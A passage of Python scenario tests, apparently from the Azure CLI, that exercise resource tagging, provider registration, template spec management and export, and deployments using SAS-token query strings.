with self.assertRaises(IncorrectUsageError):
self.cmd('resource list --tag {tag} --l westus')
with self.assertRaises(IncorrectUsageError):
self.cmd('resource list --tag {tag} --location westus')
# Scenarios without default location
self.cmd('configure --defaults location=""')
self.cmd('resource list --tag {tag}', checks=self.check('[0].id', '{vault_id}'))
with self.assertRaises(IncorrectUsageError):
self.cmd('resource list --tag {tag} -l westus')
with self.assertRaises(IncorrectUsageError):
self.cmd('resource list --tag {tag} --l westus')
with self.assertRaises(IncorrectUsageError):
self.cmd('resource list --tag {tag} --location westus')
self.cmd('resource delete --id {vault_id}', checks=self.is_empty())
def test_tag_create_or_update_subscription(self):
subscription_id = '/subscriptions/' + self.get_subscription_id()
self.utility_tag_create_or_update_scope(resource_id=subscription_id)
@ResourceGroupPreparer(name_prefix='test_tag_create_or_update_resourcegroup', location='westus')
def test_tag_create_or_update_resourcegroup(self, resource_group):
resource_group_id = '/subscriptions/' + self.get_subscription_id() + '/resourceGroups/' + resource_group
self.utility_tag_create_or_update_scope(resource_id=resource_group_id)
@ResourceGroupPreparer(name_prefix='test_tag_create_or_update_resource', location='westus')
def test_tag_create_or_update_resource(self, resource_group_location):
self.kwargs.update({
'loc': resource_group_location,
'vault': self.create_random_name('vault-', 30)
})
resource = self.cmd(
'resource create -g {rg} -n {vault} --resource-type Microsoft.RecoveryServices/vaults --is-full-object -p "{{\\"properties\\":{{}},\\"location\\":\\"{loc}\\",\\"sku\\":{{\\"name\\":\\"Standard\\"}}}}"',
checks=self.check('name', '{vault}')).get_output_in_json()
self.utility_tag_create_or_update_scope(resource_id=resource['id'])
# Utility method to test CreateOrUpdate for Tags within subscription, resource group, and tracked resources.
def utility_tag_create_or_update_scope(self, resource_id):
self.kwargs.update({
'resource_id': resource_id,
'expected_tags1': 'cliName1=cliValue1 cliName2=cliValue2',
'expected_tags2': 'cliName1=cliValue1 cliName2='
})
# 1. pass in an empty tag set, should throw error
with self.assertRaises(IncorrectUsageError):
self.cmd('tag create --resource-id {resource_id} --tags', checks=self.check('tags', {}))
# 2. pass in a complete tag string
tag_dict1 = {'cliName1': 'cliValue1', 'cliName2': 'cliValue2'}
self.cmd('tag create --resource-id {resource_id} --tags {expected_tags1}', checks=[
self.check('properties.tags', tag_dict1)
])
# 3. pass in one incomplete tag string
tag_dict2 = {'cliName1': 'cliValue1', 'cliName2': ''}
self.cmd('tag create --resource-id {resource_id} --tags {expected_tags2}', checks=[
self.check('properties.tags', tag_dict2)
])
# 4. clean up: delete the existing tags
self.cmd('tag delete --resource-id {resource_id} -y', checks=self.is_empty())
def test_tag_update_subscription(self):
subscription_id = '/subscriptions/' + self.get_subscription_id()
self.utility_tag_update_scope(resource_id=subscription_id)
@ResourceGroupPreparer(name_prefix='test_tag_update_resourcegroup', location='westus')
def test_tag_update_resourcegroup(self, resource_group):
resource_group_id = '/subscriptions/' + self.get_subscription_id() + '/resourceGroups/' + resource_group
self.utility_tag_update_scope(resource_id=resource_group_id)
@ResourceGroupPreparer(name_prefix='test_tag_update_resource', location='westus')
def test_tag_update_resource(self, resource_group_location):
self.kwargs.update({
'loc': resource_group_location,
'vault': self.create_random_name('vault-', 30)
})
resource = self.cmd(
'resource create -g {rg} -n {vault} --resource-type Microsoft.RecoveryServices/vaults --is-full-object -p "{{\\"properties\\":{{}},\\"location\\":\\"{loc}\\",\\"sku\\":{{\\"name\\":\\"Standard\\"}}}}"',
checks=self.check('name', '{vault}')).get_output_in_json()
self.utility_tag_update_scope(resource_id=resource['id'])
# Utility method to test updating tags on subscription, resource group and tracked resource, including Merge, Replace, and Delete Operation.
def utility_tag_update_scope(self, resource_id):
self.kwargs.update({
'resource_id': resource_id,
'original_tags': 'cliName1=cliValue1 cliName2=cliValue2',
'merge_tags': 'cliName1=cliValue1 cliName3=cliValue3',
'replace_tags': 'cliName1=cliValue1 cliName4=cliValue4',
'delete_tags': 'cliName4=cliValue4',
'merge_operation': 'merge',
'replace_operation': 'replace',
'delete_operation': 'delete'
})
# setup original
self.cmd('tag create --resource-id {resource_id} --tags {original_tags}')
# 1. test merge operation
after_merge_tags_dict = {'cliName1': 'cliValue1', 'cliName2': 'cliValue2', 'cliName3': 'cliValue3'}
self.cmd('tag update --resource-id {resource_id} --operation {merge_operation} --tags {merge_tags}', checks=[
self.check('properties.tags', after_merge_tags_dict)
])
# 2. test replace operation
after_replace_tags_dict = {'cliName1': 'cliValue1', 'cliName4': 'cliValue4'}
self.cmd('tag update --resource-id {resource_id} --operation {replace_operation} --tags {replace_tags}',
checks=[
self.check('properties.tags', after_replace_tags_dict)
])
# 3. test delete operation
after_delete_tags_dict = {'cliName1': 'cliValue1'}
self.cmd('tag update --resource-id {resource_id} --operation {delete_operation} --tags {delete_tags}', checks=[
self.check('properties.tags', after_delete_tags_dict)
])
# 4. clean up: delete the existing tags
self.cmd('tag delete --resource-id {resource_id} -y', checks=self.is_empty())
def test_tag_get_subscription(self):
subscription_id = '/subscriptions/' + self.get_subscription_id()
self.utility_tag_get_scope(resource_id=subscription_id)
@ResourceGroupPreparer(name_prefix='test_tag_get_resourcegroup', location='westus')
def test_tag_get_resourcegroup(self, resource_group):
resource_group_id = '/subscriptions/' + self.get_subscription_id() + '/resourceGroups/' + resource_group
self.utility_tag_get_scope(resource_id=resource_group_id)
@ResourceGroupPreparer(name_prefix='test_tag_get_resource', location='westus')
def test_tag_get_resource(self, resource_group_location):
self.kwargs.update({
'loc': resource_group_location,
'vault': self.create_random_name('vault-', 30)
})
resource = self.cmd(
'resource create -g {rg} -n {vault} --resource-type Microsoft.RecoveryServices/vaults --is-full-object -p "{{\\"properties\\":{{}},\\"location\\":\\"{loc}\\",\\"sku\\":{{\\"name\\":\\"Standard\\"}}}}"',
checks=self.check('name', '{vault}')).get_output_in_json()
self.utility_tag_get_scope(resource_id=resource['id'])
# Utility method to test Get for Tags within subscription, resource group and tracked resource.
def utility_tag_get_scope(self, resource_id):
self.kwargs.update({
'resource_id': resource_id,
'original_tags': 'cliName1=cliValue1 cliName2=cliValue2'
})
# setup original
self.cmd('tag create --resource-id {resource_id} --tags {original_tags}')
# test get operation
expected_tags_dict = {'cliName1': 'cliValue1', 'cliName2': 'cliValue2'}
self.cmd('tag list --resource-id {resource_id}', checks=[
self.check('properties.tags', expected_tags_dict)
])
# clean up: delete the existing tags
self.cmd('tag delete --resource-id {resource_id} -y', checks=self.is_empty())
class ProviderRegistrationTest(ScenarioTest):
def test_provider_registration(self):
self.kwargs.update({'prov': 'Microsoft.ClassicInfrastructureMigrate'})
result = self.cmd('provider show -n {prov}').get_output_in_json()
if result['registrationState'] == 'Unregistered':
self.cmd('provider register -n {prov}')
result = self.cmd('provider show -n {prov}').get_output_in_json()
self.assertTrue(result['registrationState'] in ['Registering', 'Registered'])
self.cmd('provider unregister -n {prov}')
result = self.cmd('provider show -n {prov}').get_output_in_json()
self.assertTrue(result['registrationState'] in ['Unregistering', 'Unregistered'])
else:
self.cmd('provider unregister -n {prov}')
result = self.cmd('provider show -n {prov}').get_output_in_json()
self.assertTrue(result['registrationState'] in ['Unregistering', 'Unregistered'])
self.cmd('provider register -n {prov}')
result = self.cmd('provider show -n {prov}').get_output_in_json()
self.assertTrue(result['registrationState'] in ['Registering', 'Registered'])
def test_provider_registration_rpaas(self):
self.kwargs.update({'prov': 'Microsoft.Confluent'})
result = self.cmd('provider show -n {prov}').get_output_in_json()
if result['registrationState'] == 'Unregistered':
with self.assertRaisesRegexp(CLIError, '--accept-terms must be specified'):
self.cmd('provider register -n {prov}')
self.cmd('provider register -n {prov} --accept-terms')
result = self.cmd('provider show -n {prov}').get_output_in_json()
self.assertTrue(result['registrationState'], 'Registered')
self.cmd('provider unregister -n {prov}')
result = self.cmd('provider show -n {prov}').get_output_in_json()
self.assertTrue(result['registrationState'] in ['Unregistering', 'Unregistered'])
else:
self.cmd('provider unregister -n {prov}')
result = self.cmd('provider show -n {prov}').get_output_in_json()
self.assertTrue(result['registrationState'] in ['Unregistering', 'Unregistered'])
with self.assertRaisesRegexp(CLIError, '--accept-terms must be specified'):
self.cmd('provider register -n {prov}')
self.cmd('provider register -n {prov} --accept-terms')
result = self.cmd('provider show -n {prov}').get_output_in_json()
self.assertTrue(result['registrationState'], 'Registered')
def test_provider_registration_mg(self):
self.kwargs.update({'prov': 'Microsoft.ClassicInfrastructureMigrate'})
result = self.cmd('provider register -n {prov} --m testmg')
self.assertTrue(result, None)
class ProviderOperationTest(ScenarioTest):
def test_provider_operation(self):
self.cmd('provider operation show --namespace microsoft.compute', checks=[
self.check('id', '/providers/Microsoft.Authorization/providerOperations/Microsoft.Compute'),
self.check('type', 'Microsoft.Authorization/providerOperations')
])
self.cmd('provider operation show --namespace microsoft.compute', checks=[
self.check('id', '/providers/Microsoft.Authorization/providerOperations/Microsoft.Compute'),
self.check('type', 'Microsoft.Authorization/providerOperations')
])
self.cmd('provider operation show --namespace microsoft.storage', checks=[
self.check("resourceTypes|[?name=='storageAccounts/blobServices/containers/blobs']|[0].operations[0].isDataAction", True),
])
class TemplateSpecsTest(ScenarioTest):
@ResourceGroupPreparer(name_prefix='cli_test_template_specs_list', parameter_name='resource_group_one', location='westus')
@ResourceGroupPreparer(name_prefix='cli_test_template_specs_list', location='westus')
def test_list_template_spec(self, resource_group, resource_group_one, resource_group_location):
curr_dir = os.path.dirname(os.path.realpath(__file__))
template_spec_name = self.create_random_name('cli-test-list-template-spec', 60)
self.kwargs.update({
'template_spec_name': template_spec_name,
'tf': os.path.join(curr_dir, 'simple_deploy.json').replace('\\', '\\\\'),
'rg': resource_group,
'rg1': resource_group_one,
'resource_group_location': resource_group_location,
})
template_spec_in_rg = self.cmd('ts create -g {rg} -n {template_spec_name} -v 1.0 -l {resource_group_location} -f "{tf}"').get_output_in_json()
template_spec_in_rg1_2 = self.cmd('ts create -g {rg1} -n {template_spec_name} -v 2.0 -l {resource_group_location} -f "{tf}"').get_output_in_json()
template_spec_in_rg1_3 = self.cmd('ts create -g {rg1} -n {template_spec_name} -v 3.0 -l {resource_group_location} -f "{tf}"').get_output_in_json()
self.kwargs['template_spec_id_rg'] = template_spec_in_rg['id'].replace('/versions/1.0', '')
self.kwargs['template_spec_version_id_rg1_2'] = template_spec_in_rg1_2['id']
self.kwargs['template_spec_version_id_rg1_3'] = template_spec_in_rg1_3['id']
self.kwargs['template_spec_id_rg1'] = template_spec_in_rg1_2['id'].replace('/versions/2.0', '')
self.cmd('ts list -g {rg1}', checks=[
self.check("length([?id=='{template_spec_id_rg}'])", 0),
self.check("length([?id=='{template_spec_id_rg1}'])", 1),
])
self.cmd('ts list -g {rg}', checks=[
self.check("length([?id=='{template_spec_id_rg}'])", 1),
self.check("length([?id=='{template_spec_id_rg1}'])", 0)
])
self.cmd('ts list -g {rg1} -n {template_spec_name}', checks=[
self.check('length([])', 2),
self.check("length([?id=='{template_spec_version_id_rg1_2}'])", 1),
self.check("length([?id=='{template_spec_version_id_rg1_3}'])", 1)
])
self.cmd('ts list', checks=[
self.check("length([?id=='{template_spec_id_rg}'])", 1),
self.check("length([?id=='{template_spec_id_rg1}'])", 1),
])
# clean up
self.cmd('ts delete --template-spec {template_spec_id_rg} --yes')
self.cmd('ts delete --template-spec {template_spec_id_rg1} --yes')
@ResourceGroupPreparer(name_prefix='cli_test_template_specs', location='westus')
def test_create_template_specs(self, resource_group, resource_group_location):
curr_dir = os.path.dirname(os.path.realpath(__file__))
template_spec_name = self.create_random_name('cli-test-create-template-spec', 60)
self.kwargs.update({
'template_spec_name': template_spec_name,
'tf': os.path.join(curr_dir, 'template_spec_with_multiline_strings.json').replace('\\', '\\\\'),
'resource_group_location': resource_group_location,
'description': '"AzCLI test root template spec"',
'version_description': '"AzCLI test version of root template spec"',
})
result = self.cmd('ts create -g {rg} -n {template_spec_name} -v 1.0 -l {resource_group_location} -f "{tf}" --description {description} --version-description {version_description}', checks=[
self.check('template.variables.provider', "[split(parameters('resource'), '/')[0]]"),
self.check('template.variables.resourceType', "[replace(parameters('resource'), concat(variables('provider'), '/'), '')]"),
self.check('template.variables.hyphenedName', ("[format('[0]-[1]-[2]-[3]-[4]-[5]', parameters('customer'), variables('environments')[parameters('environment')], variables('locations')[parameters('location')], parameters('group'), parameters('service'), if(equals(parameters('kind'), ''), variables('resources')[variables('provider')][variables('resourceType')], variables('resources')[variables('provider')][variables('resourceType')][parameters('kind')]))]")),
self.check('template.variables.removeOptionalsFromHyphenedName', "[replace(variables('hyphenedName'), '--', '-')]"),
self.check('template.variables.isInstanceCount', "[greater(parameters('instance'), -1)]"),
self.check('template.variables.hyphenedNameAfterInstanceCount', "[if(variables('isInstanceCount'), format('[0]-[1]', variables('removeOptionalsFromHyphenedName'), string(parameters('instance'))), variables('removeOptionalsFromHyphenedName'))]"),
self.check('template.variables.name', "[if(parameters('useHyphen'), variables('hyphenedNameAfterInstanceCount'), replace(variables('hyphenedNameAfterInstanceCount'), '-', ''))]")
]).get_output_in_json()
with self.assertRaises(IncorrectUsageError):
self.cmd('ts create --name {template_spec_name} -g {rg} -l {resource_group_location} --template-file "{tf}"')
# clean up
self.kwargs['template_spec_id'] = result['id'].replace('/versions/1.0', '')
self.cmd('ts delete --template-spec {template_spec_id} --yes')
@ResourceGroupPreparer(name_prefix='cli_test_template_specs', location='westus')
def test_create_template_specs_with_artifacts(self, resource_group, resource_group_location):
curr_dir = os.path.dirname(os.path.realpath(__file__))
template_spec_name = self.create_random_name('cli-test-create-template-spec', 60)
self.kwargs.update({
'template_spec_name': template_spec_name,
'tf': os.path.join(curr_dir, 'template_spec_with_artifacts.json').replace('\\', '\\\\'),
'resource_group_location': resource_group_location,
'display_name': self.create_random_name('create-spec', 20),
'description': '"AzCLI test root template spec"',
'version_description': '"AzCLI test version of root template spec"',
})
path = os.path.join(curr_dir, 'artifacts')
if not os.path.exists(path):
files = ['createKeyVault.json', 'createKeyVaultWithSecret.json', 'createResourceGroup.json']
os.makedirs(path)
for f in files:
shutil.copy(os.path.join(curr_dir, f), path)
result = self.cmd('ts create -g {rg} -n {template_spec_name} -v 1.0 -l {resource_group_location} -f "{tf}" -d {display_name} --description {description} --version-description {version_description}', checks=[
self.check('artifacts.length([])', 3),
self.check_pattern('artifacts[0].path', 'artifacts.createResourceGroup.json'),
self.check_pattern('artifacts[1].path', 'artifacts.createKeyVault.json'),
self.check_pattern('artifacts[2].path', 'artifacts.createKeyVaultWithSecret.json')
]).get_output_in_json()
self.cmd('ts create -g {rg} -n {template_spec_name} -v 1.0 -f "{tf}" --yes', checks=[
self.check('description', None),
self.check('display_name', None),
])
# clean up
self.kwargs['template_spec_id'] = result['id'].replace('/versions/1.0', '')
self.cmd('ts delete --template-spec {template_spec_id} --yes')
@ResourceGroupPreparer(name_prefix='cli_test_template_specs', location='westus')
def test_update_template_specs(self, resource_group, resource_group_location):
curr_dir = os.path.dirname(os.path.realpath(__file__))
template_spec_name = self.create_random_name('cli-test-update-template-spec', 60)
self.kwargs.update({
'template_spec_name': template_spec_name,
'tf': os.path.join(curr_dir, 'simple_deploy.json').replace('\\', '\\\\'),
'tf1': os.path.join(curr_dir, 'template_spec_with_artifacts.json').replace('\\', '\\\\'),
'resource_group_location': resource_group_location,
'display_name': self.create_random_name('create-spec', 20),
'description': '"AzCLI test root template spec"',
'version_description': '"AzCLI test version of root template spec"',
})
result = self.cmd('ts create -g {rg} -n {template_spec_name} -v 1.0 -l {resource_group_location} -f "{tf}"', checks=[
self.check('name', '1.0'),
self.check('description', None),
self.check('display_name', None),
self.check('artifacts.length([])', 0)]).get_output_in_json()
self.kwargs['template_spec_version_id'] = result['id']
self.kwargs['template_spec_id'] = result['id'].replace('/versions/1.0', '')
self.cmd('ts update -s {template_spec_id} --display-name {display_name} --description {description} --yes', checks=[
self.check('name', self.kwargs['template_spec_name']),
self.check('description', self.kwargs['description'].replace('"', '')),
self.check('displayName', self.kwargs['display_name'].replace('"', ''))
])
self.cmd('ts update -s {template_spec_version_id} --version-description {version_description} --yes', checks=[
self.check('name', '1.0'),
self.check('description', self.kwargs['version_description'].replace('"', '')),
self.check('artifacts', None)
])
path = os.path.join(curr_dir, 'artifacts')
if not os.path.exists(path):
files = ['createKeyVault.json', 'createKeyVaultWithSecret.json', 'createResourceGroup.json']
os.makedirs(path)
for f in files:
shutil.copy(os.path.join(curr_dir, f), path)
self.cmd('ts update -g {rg} -n {template_spec_name} -v 1.0 -f "{tf1}" --yes', checks=[
self.check('description', self.kwargs['version_description'].replace('"', '')),
self.check('artifacts.length([])', 3),
self.check_pattern('artifacts[0].path', 'artifacts.createResourceGroup.json'),
self.check_pattern('artifacts[1].path', 'artifacts.createKeyVault.json'),
self.check_pattern('artifacts[2].path', 'artifacts.createKeyVaultWithSecret.json')
])
# clean up
self.cmd('ts delete --template-spec {template_spec_id} --yes')
@ResourceGroupPreparer(name_prefix='cli_test_template_specs', location='westus')
def test_show_template_spec(self, resource_group, resource_group_location):
curr_dir = os.path.dirname(os.path.realpath(__file__))
template_spec_name = self.create_random_name('cli-test-get-template-spec', 60)
self.kwargs.update({
'template_spec_name': template_spec_name,
'tf': os.path.join(curr_dir, 'simple_deploy.json').replace('\\', '\\\\'),
'resource_group_location': resource_group_location,
})
result = self.cmd('ts create -g {rg} -n {template_spec_name} -v 1.0 -l {resource_group_location} -f "{tf}"', checks=[
self.check('name', '1.0')]).get_output_in_json()
self.kwargs['template_spec_version_id'] = result['id']
self.kwargs['template_spec_id'] = result['id'].replace('/versions/1.0', '')
ts_cnt = self.cmd('ts show -g {rg} --name {template_spec_name}').get_output_in_json()
assert len(ts_cnt) > 0
ts_cnt_by_id = self.cmd('ts show --template-spec {template_spec_id}').get_output_in_json()
assert len(ts_cnt_by_id) > 0
assert len(ts_cnt) == len(ts_cnt_by_id)
# clean up
self.cmd('ts delete --template-spec {template_spec_id} --yes')
@ResourceGroupPreparer(name_prefix='cli_test_template_specs', location='westus')
def test_delete_template_spec(self, resource_group, resource_group_location):
curr_dir = os.path.dirname(os.path.realpath(__file__))
template_spec_name = self.create_random_name('cli-test-list-template-spec', 60)
self.kwargs.update({
'resource_group_location': resource_group_location,
'template_spec_name': template_spec_name,
'tf': os.path.join(curr_dir, 'simple_deploy.json').replace('\\', '\\\\'),
})
result = self.cmd('ts create -g {rg} -n {template_spec_name} -v 1.0 -l {resource_group_location} -f "{tf}"',
checks=self.check('name', '1.0')).get_output_in_json()
self.kwargs['template_spec_version_id'] = result['id']
self.kwargs['template_spec_id'] = result['id'].replace('/versions/1.0', '')
self.cmd('ts show --template-spec {template_spec_version_id}')
self.cmd('ts show --template-spec {template_spec_id}')
self.cmd('ts delete --template-spec {template_spec_version_id} --yes')
self.cmd('ts list -g {rg}',
checks=[
self.check("length([?id=='{template_spec_id}'])", 1),
self.check("length([?id=='{template_spec_version_id}'])", 0)])
self.cmd('ts delete --template-spec {template_spec_id} --yes')
self.cmd('ts list -g {rg}',
checks=self.check("length([?id=='{template_spec_id}'])", 0))
@ResourceGroupPreparer(name_prefix='cli_test_template_specs', location='westus')
def test_template_spec_create_and_update_with_tags(self, resource_group, resource_group_location):
curr_dir = os.path.dirname(os.path.realpath(__file__))
template_spec_name = self.create_random_name('cli-test-template-spec-tags', 60)
self.kwargs.update({
'template_spec_name': template_spec_name,
'tf': os.path.join(curr_dir, 'simple_deploy.json').replace('\\', '\\\\'),
'resource_group_location': resource_group_location,
'display_name': self.create_random_name('create-spec', 20),
'version_tags': {'cliName1': 'cliValue1', 'cliName4': 'cliValue4'}
})
# Tags should be applied to both the parent template spec and template spec version if neither existed:
result = self.cmd('ts create -g {rg} -n {template_spec_name} -v 1.0 -l {resource_group_location} -f "{tf}" --tags cli-test=test').get_output_in_json()
self.kwargs['template_spec_version_one_id'] = result['id']
self.kwargs['template_spec_id'] = result['id'].replace('/versions/1.0', '')
self.cmd('ts show --template-spec {template_spec_version_one_id}', checks=[self.check('tags', {'cli-test': 'test'})])
self.cmd('ts show --template-spec {template_spec_id}', checks=[self.check('tags', {'cli-test': 'test'})])
# New template spec version should inherit tags from parent template spec if tags are not specified:
self.cmd('ts create -g {rg} -n {template_spec_name} -v 2.0 -l {resource_group_location} -f "{tf}"')
self.kwargs['template_spec_version_two_id'] = result['id'].replace('/versions/1.0', '/versions/2.0')
self.cmd('ts show --template-spec {template_spec_version_two_id}', checks=[self.check('tags', {'cli-test': 'test'})])
# Tags should only apply to template spec version (and not the parent template spec) if parent already exist:
self.cmd('ts create -g {rg} -n {template_spec_name} -v 3.0 -l {resource_group_location} -f "{tf}" --tags cliName1=cliValue1 cliName4=cliValue4')
self.kwargs['template_spec_version_three_id'] = result['id'].replace('/versions/1.0', '/versions/3.0')
self.cmd('ts show --template-spec {template_spec_version_three_id}', checks=[self.check('tags', '{version_tags}')])
self.cmd('ts show --template-spec {template_spec_id}', checks=[self.check('tags', {'cli-test': 'test'})])
# When updating a template spec, tags should only be removed if explicitely empty. Create should override.
self.cmd('ts update -g {rg} -n {template_spec_name} -v 1.0 -f "{tf}" --yes')
self.cmd('ts show --template-spec {template_spec_version_one_id}', checks=[self.check('tags', {'cli-test': 'test'})])
self.cmd('ts update -g {rg} -n {template_spec_name} -v 1.0 -f "{tf}" --tags "" --yes')
self.cmd('ts show --template-spec {template_spec_version_one_id}', checks=[self.check('tags', {})])
self.cmd('ts update -g {rg} -n {template_spec_name} -v 2.0 -f "{tf}" --tags --yes')
self.cmd('ts show --template-spec {template_spec_version_two_id}', checks=[self.check('tags', {})])
self.cmd('ts create -g {rg} -n {template_spec_name} -v 3.0 -f "{tf}" --tags --yes')
self.cmd('ts show --template-spec {template_spec_version_three_id}', checks=[self.check('tags', {})])
self.cmd('ts show --template-spec {template_spec_id}', checks=[self.check('tags', {'cli-test': 'test'})])
self.cmd('ts create -g {rg} -n {template_spec_name} --yes')
self.cmd('ts show --template-spec {template_spec_id}', checks=[self.check('tags', {})])
# clean up
self.cmd('ts delete --template-spec {template_spec_id} --yes')
class TemplateSpecsExportTest(LiveScenarioTest):
@ResourceGroupPreparer(name_prefix='cli_test_template_specs', location='westus')
def test_export_template_spec(self, resource_group, resource_group_location):
curr_dir = os.path.dirname(os.path.realpath(__file__))
dir_name = self.create_random_name('TemplateSpecExport', 30)
dir_name2 = self.create_random_name('TemplateSpecExport', 30)
template_spec_name = self.create_random_name('cli-test-export-template-spec', 60)
self.kwargs.update({
'template_spec_name': template_spec_name,
'tf': os.path.join(curr_dir, 'template_spec_with_artifacts.json').replace('\\', '\\\\'),
'resource_group_location': resource_group_location,
'output_folder': os.path.join(curr_dir, dir_name).replace('\\', '\\\\'),
'output_folder2': os.path.join(curr_dir, dir_name2).replace('\\', '\\\\'),
})
path = os.path.join(curr_dir, 'artifacts')
if not os.path.exists(path):
files = ['createKeyVault.json', 'createKeyVaultWithSecret.json', 'createResourceGroup.json']
os.makedirs(path)
for f in files:
shutil.copy(os.path.join(curr_dir, f), path)
result = self.cmd('ts create -g {rg} -n {template_spec_name} -v 1.0 -l {resource_group_location} -f "{tf}"',
checks=self.check('name', '1.0')).get_output_in_json()
self.kwargs['template_spec_version_id'] = result['id']
os.makedirs(self.kwargs['output_folder'])
output_path = self.cmd('ts export -g {rg} --name {template_spec_name} --version 1.0 --output-folder {output_folder}').get_output_in_json()
template_file = os.path.join(output_path, (self.kwargs['template_spec_name'] + '.json'))
artifactFile = os.path.join(output_path, 'artifacts' + os.sep + 'createResourceGroup.json')
artifactFile1 = os.path.join(output_path, 'artifacts' + os.sep + 'createKeyVault.json')
artifactFile2 = os.path.join(output_path, 'artifacts' + os.sep + 'createKeyVaultWithSecret.json')
self.assertTrue(os.path.isfile(template_file))
self.assertTrue(os.path.isfile(artifactFile))
self.assertTrue(os.path.isfile(artifactFile1))
self.assertTrue(os.path.isfile(artifactFile2))
os.makedirs(self.kwargs['output_folder2'])
output_path2 = self.cmd('ts export --template-spec {template_spec_version_id} --output-folder {output_folder2}').get_output_in_json()
_template_file = os.path.join(output_path2, (self.kwargs['template_spec_name'] + '.json'))
_artifactFile = os.path.join(output_path2, 'artifacts' + os.sep + 'createResourceGroup.json')
_artifactFile1 = os.path.join(output_path2, 'artifacts' + os.sep + 'createKeyVault.json')
_artifactFile2 = os.path.join(output_path2, 'artifacts' + os.sep + 'createKeyVaultWithSecret.json')
self.assertTrue(os.path.isfile(_template_file))
self.assertTrue(os.path.isfile(_artifactFile))
self.assertTrue(os.path.isfile(_artifactFile1))
self.assertTrue(os.path.isfile(_artifactFile2))\
class DeploymentTestsWithQueryString(LiveScenarioTest):
@ResourceGroupPreparer(name_prefix='cli_test_query_str_rg', location='eastus')
@StorageAccountPreparer(name_prefix='testquerystrrg', location='eastus', kind='StorageV2')
def test_resource_group_level_deployment_with_query_string(self, resource_group, resource_group_location, storage_account):
container_name = self.create_random_name('querystr', 20)
curr_dir = os.path.dirname(os.path.realpath(__file__))
tf = os.path.join(curr_dir, 'resource_group_level_linked_template.json')
linked_template = os.path.join(curr_dir, 'storage_account_linked_template.json')
self.kwargs.update({
'resource_group': resource_group,
'storage_account': storage_account,
'container_name': container_name,
'tf': tf,
'linked_tf': linked_template
})
self.kwargs['storage_key'] = str(self.cmd('az storage account keys list -n {storage_account} -g {resource_group} --query "[0].value"').output)
self.cmd('storage container create -n {container_name} --account-name {storage_account} --account-key {storage_key}')
self.cmd('storage blob upload -c {container_name} -f "{tf}" -n mainTemplate --account-name {storage_account} --account-key {storage_key}')
self.cmd('storage blob upload -c {container_name} -f "{linked_tf}" -n storage_account_linked_template.json --account-name {storage_account} --account-key {storage_key}')
from datetime import datetime, timedelta
self.kwargs['expiry'] = (datetime.utcnow() + timedelta(hours=12)).strftime('%Y-%m-%dT%H:%MZ')
self.kwargs['sas_token'] = self.cmd(
'storage container generate-sas --account-name {storage_account} --account-key {storage_key} --name {container_name} --permissions rw --expiry {expiry} -otsv').output.strip()
self.kwargs['blob_url'] = self.cmd(
'storage blob url -c {container_name} -n mainTemplate --account-name {storage_account} --account-key {storage_key}').output.strip()
self.cmd('deployment group validate -g {resource_group} --template-uri {blob_url} --query-string "{sas_token}" --parameters projectName=qsproject', checks=[
self.check('properties.provisioningState', 'Succeeded')
])
self.cmd('deployment group create -g {resource_group} --template-uri {blob_url} --query-string "{sas_token}" --parameters projectName=qsproject', checks=[
self.check('properties.provisioningState', 'Succeeded')
])
@ResourceGroupPreparer(name_prefix='cli_test_query_str_sub', location='eastus')
@StorageAccountPreparer(name_prefix='testquerystrsub', location='eastus', kind='StorageV2')
def test_subscription_level_deployment_with_query_string(self, resource_group, resource_group_location, storage_account):
container_name = self.create_random_name('querystr', 20)
curr_dir = os.path.dirname(os.path.realpath(__file__))
tf = os.path.join(curr_dir, 'subscription_level_linked_template.json')
linked_tf = os.path.join(curr_dir, 'createResourceGroup.json')
linked_tf1 = os.path.join(curr_dir, 'createKeyVault.json')
linked_tf2 = os.path.join(curr_dir, 'createKeyVaultWithSecret.json')
self.kwargs.update({
'resource_group': resource_group,
'resource_group_location': resource_group_location,
'storage_account': storage_account,
'container_name': container_name,
'tf': tf,
'linked_tf': linked_tf,
'linked_tf1': linked_tf1,
'linked_tf2': linked_tf2
})
self.kwargs['storage_key'] = str(self.cmd('az storage account keys list -n {storage_account} -g {resource_group} --query "[0].value"').output)
self.cmd('storage container create -n {container_name} --account-name {storage_account} --account-key {storage_key}')
self.cmd('storage blob upload -c {container_name} -f "{tf}" -n mainTemplate --account-name {storage_account} --account-key {storage_key}')
self.cmd('storage blob upload -c {container_name} -f "{linked_tf}" -n createResourceGroup.json --account-name {storage_account} --account-key {storage_key}')
self.cmd('storage blob upload -c {container_name} -f "{linked_tf1}" -n createKeyVault.json --account-name {storage_account} --account-key {storage_key}')
self.cmd('storage blob upload -c {container_name} -f "{linked_tf2}" -n createKeyVaultWithSecret.json --account-name {storage_account} --account-key {storage_key}')
from datetime import datetime, timedelta
self.kwargs['expiry'] = (datetime.utcnow() + timedelta(hours=12)).strftime('%Y-%m-%dT%H:%MZ')
self.kwargs['sas_token'] = self.cmd(
'storage container generate-sas --account-name {storage_account} --name {container_name} --permissions dlrw --expiry {expiry} --https-only -otsv').output.strip()
self.kwargs['blob_url'] = self.cmd(
'storage blob url -c {container_name} -n mainTemplate --account-name {storage_account}').output.strip()
self.kwargs['key_vault'] = self.create_random_name('querystrKV', 20)
self.cmd('deployment sub validate -l {resource_group_location} --template-uri {blob_url} --query-string "{sas_token}" --parameters keyVaultName="{key_vault}" rgName="{resource_group}" rgLocation="{resource_group_location}"', checks=[
self.check('properties.provisioningState', 'Succeeded')
])
self.cmd('deployment sub create -l {resource_group_location} --template-uri {blob_url} --query-string "{sas_token}" --parameters keyVaultName="{key_vault}" rgName="{resource_group}" rgLocation="{resource_group_location}"', checks=[
self.check('properties.provisioningState', 'Succeeded')
])
class DeploymentTestAtSubscriptionScope(ScenarioTest):
def tearDown(self):
self.cmd('policy assignment delete -n location-lock')
self.cmd('policy definition delete -n policy2')
self.cmd('group delete -n cli_test_subscription_level_deployment --yes')
@AllowLargeResponse(4096)
def test_subscription_level_deployment(self):
curr_dir = os.path.dirname(os.path.realpath(__file__))
self.kwargs.update({
'tf': os.path.join(curr_dir, 'subscription_level_template.json').replace('\\', '\\\\'),
'params': os.path.join(curr_dir, 'subscription_level_parameters.json').replace('\\', '\\\\'),
# params-uri below is the raw file url of the subscription_level_parameters.json above
'params_uri': 'https://raw.githubusercontent.com/Azure/azure-cli/dev/src/azure-cli/azure/cli/command_modules/resource/tests/latest/subscription_level_parameters.json',
'dn': self.create_random_name('azure-cli-subscription_level_deployment', 60),
'dn2': self.create_random_name('azure-cli-subscription_level_deployment', 60),
'storage-account-name': self.create_random_name('armbuilddemo', 20)
})
